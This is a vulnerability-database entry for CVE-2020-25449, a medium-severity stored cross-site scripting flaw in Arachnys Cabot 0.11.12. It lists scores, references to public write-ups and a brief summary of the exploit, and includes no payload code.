CVE-2020-25449

MEDIUM

Arachnys Cabot 0.11.12 - Cross-Site Scripting via Address Column

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2020-25449. PoCs published by Abhiram V.

AI-analyzed exploit summary This is a technical writeup detailing a persistent XSS vulnerability in Cabot 0.11.12, where a malicious payload in the 'Address' field of a new instance triggers when an admin views the notification, leading to potential account takeover.

Description

Cross Site Scripting (XSS) vulnerability in Arachnys Cabot 0.11.12 can be exploited via the Address column.

Exploits (1)

exploitdb WRITEUP
by Abhiram V · textwebappsmultiple
https://www.exploit-db.com/exploits/48791

This is a technical writeup detailing a persistent XSS vulnerability in Cabot 0.11.12, where a malicious payload in the 'Address' field of a new instance triggers when an admin views the notification, leading to potential account takeover.

Classification
Writeup 90%
Attack Type
Xss
Complexity
Moderate
Reliability
Reliable
Target: Cabot 0.11.12
Auth required
Prerequisites: User account with permissions to create instances · Admin interaction with the notification
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (4)

Core 4
Core References
Exploit, Third Party Advisory x_refsource_misc
https://itsmeanonartist.tech/blogs/blog2.html
Third Party Advisory, VDB Entry x_refsource_misc
https://www.exploit-db.com/exploits/48791
Exploit, Third Party Advisory, VDB Entry x_refsource_misc
https://packetstormsecurity.com/files/159070/Cabot-0.11.12-Cross-Site-Scripting.html
Exploit, Third Party Advisory x_refsource_misc
https://www.exploitalert.com/view-details.html?id=36106

Scores

CVSS v3 4.8
EPSS 0.0052
EPSS Percentile 67.4%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Details

CWE
CWE-79
Status published
Products (2)
arachnys/cabot 0.11.12
pypi/cabot 0PyPI
Published Dec 04, 2020
Tracked Since Feb 18, 2026